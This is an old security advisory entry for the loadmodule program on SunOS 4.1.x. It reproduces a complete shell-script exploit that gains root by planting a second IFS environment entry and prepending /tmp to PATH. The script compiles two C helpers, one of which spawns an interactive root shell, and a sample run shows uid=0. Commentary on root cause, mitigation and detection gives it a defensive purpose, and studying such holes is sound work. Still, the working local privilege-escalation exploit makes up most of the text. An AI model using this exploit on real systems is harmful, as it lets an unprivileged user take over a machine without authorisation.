COMMAND

    loadmodule

SYSTEMS AFFECTED

    SunOs 4.1.x

PROBLEM

#!/bin/sh
#
# Usage: load.root
#
# Obtain root privileges using loadmodule.
#
# loadmodule  has previously  been fixed  to clear  IFS, apparently by
# putenv("IFS=  ").   However,  we  can  still  exploit  system()   by
# having IFS defined twice in our environment.
#
# NB
# Some installations place loadmodule in $OPENWINHOME/bin.
#
# Sample run:
#
#	% load.root
#	# id
#	uid=0(root) gid=10(staff) groups=10(staff)
#	# exit
#	loadmodule: /usr/sys/sun4/OBJ/SandraBullock file does not exist.
#	Check your OpenWindows installation.
#	%
#
# Review notes (defender's reading of the mechanism described above):
#
# Root cause: a set-uid program invokes a shell via system() while
# inheriting the caller's environment.  Removing a single IFS entry
# with putenv() is not a complete sanitisation, because putenv() only
# replaces the first matching entry; a second IFS entry (created here
# by rewriting the name of the SUN variable in place) survives and is
# honoured by sh.  The durable fix is to not call system()/popen() from
# a set-uid program at all, or to exec the child with a fixed, fully
# constructed environment and an absolute PATH rather than patching
# individual variables -- plus the vendor patch for this issue.
#
# Mitigation on affected hosts: apply the vendor fix, or clear the
# set-uid bit on loadmodule (this script refuses to run without it,
# see the -u test below).  The same check is a useful audit query.
#
# Detection artefacts visible in this script: the set-uid check on
# /usr/lib/loadmodule, PATH being prepended with a world-writable temp
# directory, a set-uid binary named "bin" in $TMPDIR, and a root sh -i
# spawned from loadmodule.  Filenames here are fixed strings and are
# presumably trivial to rename, so do not rely on them alone.



# Precondition: the target must exist and carry the set-uid bit (-u).
# Without set-uid the environment trick gains nothing, so bail out.
if [ ! -u "/usr/lib/loadmodule" ]; then
	echo "$0: /usr/lib/loadmodule does not exist, or not S_ISUID."
	exit 1
fi

# Files created below are readable only by the invoking user.
umask 077

# TMPDIR is where we will build the necessary binaries, which
# we will clean up afterwards.
# NOTE(review): fixed, predictable names under /tmp -- the filenames
# are a monitoring artefact as much as a cleanup concern.

TMPDIR=/tmp
export TMPDIR

# Prepending TMPDIR to PATH is what lets a bare word such as "bin",
# produced when sh splits a path on the substituted IFS, resolve to
# the binary built in $TMPDIR rather than to the intended program.
# This is why set-uid code must not trust an inherited PATH either.
PATH=$TMPDIR:$PATH
export PATH

# set  env  IFS,  which  loadmodule  will  reset.   SUN  will    later
# be  renamed  by  our  executable   to  IFS  (the  value of SUN  will
# be used by sh as the value of IFS).
# After the rename the environment holds two IFS entries: the one
# loadmodule's putenv() overwrites (this one) and "IFS=/" (from SUN).

IFS=2
SUN=/
export IFS
export SUN

# create program to run loadmodule
# getenv() returns a pointer into the environment string just past the
# '=' of "SUN=/"; stepping back 4 bytes reaches the start of the name,
# and overwriting 3 bytes turns "SUN=/" into "IFS=/" in place.  This
# relies on the environment block layout of the C library in use.

cat > $TMPDIR/California.c << 'EOF'
extern char *getenv();
main()
{
	char *c;
	c=getenv("SUN");
	c-=4;
	memcpy(c, "IFS", 3);
	execl("/usr/lib/loadmodule", "loadmodule",
		"SandraBullock", "SimoneAngel", (char *)0);
}
EOF

# create something to give us a shell as root
# Compiled as $TMPDIR/bin (see cc below).  It restores a sane IFS
# before exec'ing sh so the resulting shell is usable; setuid(0) makes
# the real uid match the effective uid inherited from loadmodule.

cat > $TMPDIR/FordEconoline.c << 'EOF'
main()
{
	setuid(0);
	putenv("IFS=");
	execl("/bin/sh", "sh", "-i", (char *)0);
}
EOF

# compile our programs
# The shell payload is deliberately named "bin" so that "/bin/..."
# split on IFS="/" yields a word that PATH resolves to it.

cc -o $TMPDIR/bin $TMPDIR/FordEconoline.c
cc -o $TMPDIR/California $TMPDIR/California.c


# We should get a # prompt at this point

$TMPDIR/California

# clean up
# Runs only after the interactive shell exits; an abandoned session
# leaves the set-uid "bin" binary behind in $TMPDIR.

rm -f $TMPDIR/bin $TMPDIR/California\
	$TMPDIR/FordEconoline.c $TMPDIR/California.c